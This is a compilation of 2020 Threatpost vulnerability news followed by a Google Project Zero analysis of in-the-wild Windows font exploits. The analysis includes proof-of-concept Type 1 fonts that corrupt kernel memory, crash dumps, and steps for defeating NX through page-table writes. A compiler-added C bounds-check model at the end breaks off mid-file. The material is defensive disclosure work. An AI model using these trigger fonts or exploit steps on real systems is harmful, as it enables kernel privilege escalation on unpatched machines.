“If the current user is logged in as admin, an attacker could host a specially crafted website hosting this vulnerability; once the unpatched user navigates to the malicious site, the attacker could then exploit this bug, allowing the attacker to gain remote access to the host,” he explained. “This bug would allow the attacker to view, change, delete data or even install ransomware.”

Although the scope of this vulnerability is somewhat limited because IE has seen a steady decline in its user base, it remains an attractive vector for cybercriminals, Hass added.

Meanwhile, two of the actively exploited bugs are important-rated RCE issues in the Windows Adobe Type Manager Library.

The first, [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), was already public. It arises because the library improperly handles a specially crafted multiple-master font in the Adobe Type 1 PostScript format.

“Attackers can use this vulnerability to execute their code on affected systems if they can convince a user to view a specially crafted font,” according to Dustin Childs of ZDI, in a [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/4/14/the-april-2020-security-update-review>). “The code would run at the level of the logged-on user.”

The related bug is the zero-day [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), an RCE vulnerability in an OpenType font renderer within Windows.
Again, an attacker could execute code on a target system if a user viewed a specially crafted font.

Though the two are related, “there is currently no confirmation that the two are related to the same set of in-the-wild attacks,” Narang told Threatpost. As for the attack vector, “to exploit these flaws, an attacker would need to socially engineer a user into opening a malicious document or viewing the document in the Windows Preview pane,” he added.

Both of these bugs have been used in attacks against Windows 7 systems, and Childs noted that not all Windows 7 systems will receive a patch, since the OS left support in January of this year.

The final actively exploited bug, also not previously publicly disclosed, is [CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>), which exists in the way the Windows kernel handles objects in memory. “An attacker who successfully exploited the vulnerability could execute code with elevated permissions,” according to Microsoft, which rated the flaw “important.”

To exploit the vulnerability, a locally authenticated attacker would need to run a specially crafted application.

**Other Priority Patches**

Microsoft also patched several other notable bugs that researchers said admins should prioritize in the large update.

[CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>) is the second previously disclosed issue, an important-rated privilege-elevation vulnerability in OneDrive for Windows.
It exists due to improper handling of symbolic links, and exploitation would allow an attacker to further compromise a system, execute additional payloads that need higher privileges to be effective, or gain access to personal or confidential information that was not available previously.

“An attacker that has gained access to an endpoint could use OneDrive to overwrite a targeted file, leading to an elevated status,” Hass told Threatpost. “OneDrive is extremely popular and often installed by default on Windows 10. When you combine this with remote work, and the ever-growing use of personal devices for remote work, it makes the potential scope for this vulnerability pretty high.”

ZDI’s Childs also flagged an important-rated Windows DNS denial-of-service (DoS) bug, [CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>), which affects client systems.

“An attacker could cause the DNS service to be nonresponsive by sending some specially crafted DNS queries to an affected system,” Childs wrote. “Considering the damage that could be done by an unauthenticated attacker, this should be high on your test and deploy list.”

Another, [CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>), is an important-rated Windows token security feature bypass vulnerability that stems from Windows improperly handling token relationships in Windows 10 version 1903 and higher.

“It’s not often you see a security feature bypass directly result in a sandbox escape, but that’s exactly what this bug allows,” Childs explained.
“Attackers could abuse this to allow an application with a certain integrity level to execute code at a different, presumably higher, integrity level.”

**Critical SharePoint Bugs**

SharePoint, a web-based collaboration platform that integrates with Microsoft Office, is often used as a document management and storage system. The platform saw its share of critical problems this month, including four critical RCE bugs, which arise because the software does not check the source markup of an application package, according to [Microsoft’s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>).

The bug tracked as [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>) allows RCE and affects Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 Service Pack 2, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019.

A second critical bug ([CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>)) also allows RCE; it affects Microsoft Business Productivity Servers 2010 Service Pack 2, Microsoft SharePoint Enterprise Server 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019.

Yet another RCE problem ([CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>)) affects Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019; and [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>) affects Microsoft SharePoint Enterprise Server 2016 and Microsoft SharePoint Server 2019.

For all of the RCE bugs, “an attacker who successfully exploited the vulnerability
could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account,” Microsoft said in the individual bug advisories. An attacker could exploit any of them by uploading a specially crafted SharePoint application package to an affected version of SharePoint.

SharePoint also harbors a fifth critical bug, [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>). This is an XSS flaw that affects Microsoft SharePoint Server 2019 and Enterprise Server 2016 and would allow spoofing.

**Not One to Skip Amidst WFH**

Even though IT and security organizations are already strained by the sudden shift to remote working in the face of the coronavirus pandemic, April’s Patch Tuesday is not one to skip, Richard Melick, senior technical product manager at Automox, told Threatpost, least of all given the four actively exploited bugs.

“From increasingly diverse technological environments to a list of unknown connectivity factors, IT and SecOps managers need to create a deployment plan that addresses today’s zero-day, exploited and critical vulnerabilities within 24 hours and the rest within 72 hours in order to stay ahead of weaponization,” he advised. “Hackers are not taking time off; they are working just as hard as everyone else.”

Melick also said that the consequences of exploitation could be exacerbated by the [work-from-home (WFH) lapses in security](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) that may be present.

“With today’s remote workforce environment and the necessity of sharing documents through email or file share, all it takes is one phishing email, malicious website or exploited document to open the door for an attacker,” he said.
“Once in, a malicious party would have the ability to modify data, install backdoors or new software, or gain full user rights accounts. While older versions of Windows are more susceptible to both exploits, the adoption rate of Windows 10 is only a little above 50 percent, leaving more than enough targets for attackers.”

Teams should be ready for plenty of overhead in terms of the patching work involved, added Jonathan Cran, head of research at Kenna Security.

“Given the shift to remote work for many organizations in combination with the current patch load from Oracle’s update earlier this week and what looks like a backlog of patching, this looks like a busy month for many security teams,” Cran told Threatpost. “We have yet to see how work from home impacts patching rates, but for security teams, installing numerous patches on remote employee laptops, likely via a corporate VPN to the Windows Server Update Services or Microsoft System Center Configuration Manager, will be a resource- and time-intensive endeavor.”

*(Threatpost, “April Patch Tuesday: Microsoft Battles 4 Bugs Under Active Exploit”, published 2020-04-14, https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/. CVEs referenced: CVE-2020-0927, CVE-2020-0929, CVE-2020-0931, CVE-2020-0932, CVE-2020-0935, CVE-2020-0938, CVE-2020-0968, CVE-2020-0974, CVE-2020-0981, CVE-2020-0993, CVE-2020-1020, CVE-2020-1027.)*

---

Google said Monday it has patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affects versions of Chrome running on the Windows, macOS and Linux platforms.

The zero-day vulnerability, tracked as CVE-2020-6418, is a type confusion bug and has a severity rating of high. Google said the flaw affects versions of Chrome released before version 80.0.3987.122. The bug lies in Chrome’s open-source JavaScript and WebAssembly engine, V8.

Technical details of CVE-2020-6418 are being withheld until the patch has been deployed to a majority of affected Chrome installations, [according to Google](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>).
A type confusion bug lets code operate on an object as if it were of a different type than it actually is, so reads and writes land at the wrong offsets; in a JavaScript engine, this kind of memory corruption can usually be turned into arbitrary code execution on the targeted device.

In the context of web browser engines, a similar memory corruption bug exploited by adversaries [earlier this month](<https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/>) enticed victims to visit a specially crafted web site booby-trapped with an exploit that took advantage of a browser memory corruption flaw to execute code remotely.

Google’s Threat Analysis Group and researcher Clément Lecigne are credited with finding the bug.

Google is also warning users of two additional high-severity vulnerabilities. One, tracked as CVE-2020-6407, is an “out of bounds memory access in streams” bug. The other, which does not have a CVE assignment, is an integer overflow in ICU, a class of flaw commonly associated with denial of service and possibly code execution.

Mitigation: Windows, Linux and macOS users should download and install [the latest version of Chrome](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>).

*(Threatpost, “Google Patches Chrome Browser Zero-Day Bug, Under Attack”, published 2020-02-25, https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/. CVEs referenced: CVE-2020-6407, CVE-2020-6418.)*

---

Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser
that patches a zero-day vulnerability in the software’s FreeType font rendering library that was actively being exploited in the wild.

Security researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>), which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.

By Tuesday, Google had already released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac and Linux, among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated high risk.

“Google is aware of reports that an exploit for CVE-2020-15999 exists in the wild,” Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.

[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the “super-fast” response to the zero-day.

Still, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed an exploit against Chrome, other software that embeds FreeType may be vulnerable as well, since the upstream fix had only just landed.
He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType project page and urged them to update other potentially vulnerable software.

“The fix is also in today’s stable release of FreeType 2.10.4,” Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).

Meanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.

“Make sure you update your Chrome today! (restart it!),” [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.

In addition to the FreeType zero-day, Google patched four other bugs, three of high risk and one of medium risk, in the Chrome update released this week.

The high-risk vulnerabilities are: CVE-2020-16000, described as “inappropriate implementation in Blink;” CVE-2020-16001, described as “use after free in media;” and CVE-2020-16002, described as “use after free in PDFium,” according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as “use after free in printing,” Bommana wrote.

So far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser.
Prior to this week’s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).

*(Threatpost, “Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser”, published 2020-10-21, https://threatpost.com/google-patches-zero-day-browser/160393/. CVEs referenced: CVE-2019-13720, CVE-2020-15999, CVE-2020-16000, CVE-2020-16001, CVE-2020-16002, CVE-2020-16003, CVE-2020-6418.)*

---

Flaws in Google’s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google’s Project Zero went one step further and asserted that both bugs are actively being exploited.

In its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. The most troubling of these, tracked as CVE-2020-16009, is rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google’s open-source JavaScript and WebAssembly engine, V8.
In its disclosure, the flaw is described as an “inappropriate implementation in V8”.

Clément Lecigne of Google’s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero’s team.

As for the Android version of Chrome, which also has an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and is described as a “heap buffer overflow in UI on Android.” Credited with discovering the bug on Oct. 31 are Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.

## **‘Actively Exploited in the Wild’**

Google said it was withholding the technical details of both bugs pending the distribution of patches to affected endpoints. While Google acknowledged reports that exploits exist in the wild for both bugs, its bulletins did not state that either one was under active attack. Google’s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.

“Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,” he [wrote](<https://twitter.com/benhawkes/status/1323374326150701057>) on November 2, 2020.

As a precaution, Google said in its security update that it would “also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed,” according to the post.

## **The Other Chrome Bugs**

The new Chrome for Android release also includes stability and performance improvements, according to the Google Chrome team.

Vulnerabilities patched in the Chrome desktop update included a “use after free” bug (CVE-2020-16004); an “insufficient policy enforcement in ANGLE” flaw (CVE-2020-16005); an “insufficient data validation in installer” issue (CVE-2020-16007) and a “stack buffer overflow in WebRTC” bug (CVE-2020-16008). Lastly, Google reported a “heap buffer overflow in UI on Windows,” tracked as CVE-2020-16011.

This week’s Chrome updates come on the heels of a zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google affecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome’s FreeType font rendering library.

The latest vulnerabilities mean that in just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser.
In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).

*(Threatpost, “Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits”, published 2020-11-03, https://threatpost.com/chrome-holes-actively-targeted/160890/. CVEs referenced: CVE-2019-13720, CVE-2020-14750, CVE-2020-15999, CVE-2020-16004, CVE-2020-16005, CVE-2020-16007, CVE-2020-16008, CVE-2020-16009, CVE-2020-16010, CVE-2020-16011, CVE-2020-6418.)*

---

*(Source: Google Project Zero blog)*

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

## 1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

### Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs.
GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the [blend operator](<https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html>)).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2, "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome [uses](<https://bugs.chromium.org/p/chromium/issues/detail?id=365160>), so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear; possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

### Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and it is hard to find any official information on it.
The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

```c
int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[2];    /* only two slots, but numMasters may be as high as 16 */
  Fixed16_16 values[2];

  /* one output pointer per master; writes past ptrs[1] when numMasters > 2 */
  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }

  for (int i = 0; i < 2; i++) {
    /* reads numMasters fixed-point values into the two-element values array */
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }
    /* stores each value through the corresponding (possibly corrupted) pointer */
    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }

  return 0;
}
```

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0 and 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

| Offset | Contents | Role |
| --- | --- | --- |
| ... | ... | |
| RSP + 0x30 | ptrs[0] | user-controlled local array |
| RSP + 0x38 | ptrs[1] | user-controlled local array |
| RSP + 0x40 | saved RDI | internal control flow data |
| RSP + 0x48 | return address | internal control flow data |
| RSP + 0x50 | values[0 .. 1] | user-controlled local array |
| RSP + 0x58 | saved RBX | internal control flow data |
| RSP + 0x60 | saved RSI | internal control flow data |
| ... | ... | |

The rows marked "user-controlled local array" hold the two local arrays, and the rows marked "internal control flow data" are the state that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values.
A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font and recompiling it (e.g. with the detype1 and type1 utilities that are part of [AFDKO](<https://github.com/adobe-type-tools/afdko/>)) to add two extra objects to the .PFB file.
A minimal sample in textual form is shown below:

```postscript
%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/WeightVector [0 0 0 0 0] def
/Private begin
/Blend begin
/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark
```

The `/WeightVector` line sets numMasters to 5, and the `/VToHOrigin` line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

```
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy
ATMFD+0x22144:
fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????
Resetting default scope
```

The faulting instruction is the `ptrs[num][i] = values[num]` store: rcx holds the corrupted ptrs[4] (0xffffffff41414141), rbx the index i (0 in the first outer iteration) and eax the 0x42424242 read into values[4].

### Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the [Adobe Font Metrics File Format Specification](<https://www.adobe.com/content/dam/acom/en/devnet/font/pdfs/5004.AFM_Spec.pdf>) document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions.
Let's analyze the C-like pseudocode:

```c
int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }

  return 0;
}
```

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

```postscript
%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
/Private begin
/Blend begin
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark
```

In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

```text
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???
Resetting default scope
```

### Exploitation

According to our analysis, the font exploit supported the following Windows versions:

 * Windows 8.1 (NT 6.3)
 * Windows 8 (NT 6.2)
 * Windows 7 (NT 6.1)
 * Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload.
Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed [here](<https://googleprojectzero.blogspot.com/2015/08/one-font-vulnerability-to-rule-them-all_13.html>)), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

```text
0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90    PPE at FFFFF6FB7DBF2000    PDE at FFFFF6FB7E400000    PTE at FFFFF6FC80000000
contains 0000000115879863  contains 0000000115878863  contains 0000000115877863  contains 8000000115976863
pfn 115879 ---DA--KWEV     pfn 115878 ---DA--KWEV     pfn 115877 ---DA--KWEV     pfn 115976 ---DA--KW-V
```

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address: the [shared user data](<https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm>) region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did: it disabled the NX bit in the PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to the next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with an ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

### The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too.
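Before looking at the patched pseudocode, here is an added C model of the bound that both patches enforce, written for this post and not taken from atmfd. It parses a constructed /BlendDesignPositions-style nested array (outer `[...]`, inner `[n n n]` lists of decimal numbers converted to 16.16 fixed point) into the same values[16][15] array the post describes, and refuses the 17th inner array before anything is written past values[15]. The type and function names (BlendReader, parse_blend_design_positions, build_empty_masters and the rest) are this example's own; only the array dimensions and the -4 status are taken from the post. One deliberate extension: the post does not show what GetOpenFixedArray does with a 16th element, so this model rejects it rather than guessing.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not atmfd code. MAX_MASTERS/MAX_AXES mirror the
 * values[16][15] array from the post and -4 mirrors the patched status;
 * every other name here is this example's own (hypothetical). */
#define MAX_MASTERS 16
#define MAX_AXES    15
#define ERR_LIMIT   (-4)   /* too many masters or axes */
#define ERR_SYNTAX  (-1)   /* malformed input */

typedef int32_t Fixed16_16;  /* 16.16 fixed point */

typedef struct {
    const char *p;                              /* cursor into the font text */
    int num_masters;                            /* inner arrays accepted so far */
    int num_axes;                               /* length of the last inner array */
    Fixed16_16 values[MAX_MASTERS][MAX_AXES];
} BlendReader;

static void skip_ws(BlendReader *r) {
    while (*r->p && isspace((unsigned char)*r->p)) r->p++;
}

/* One decimal token -> 16.16 fixed point (truncated toward zero). */
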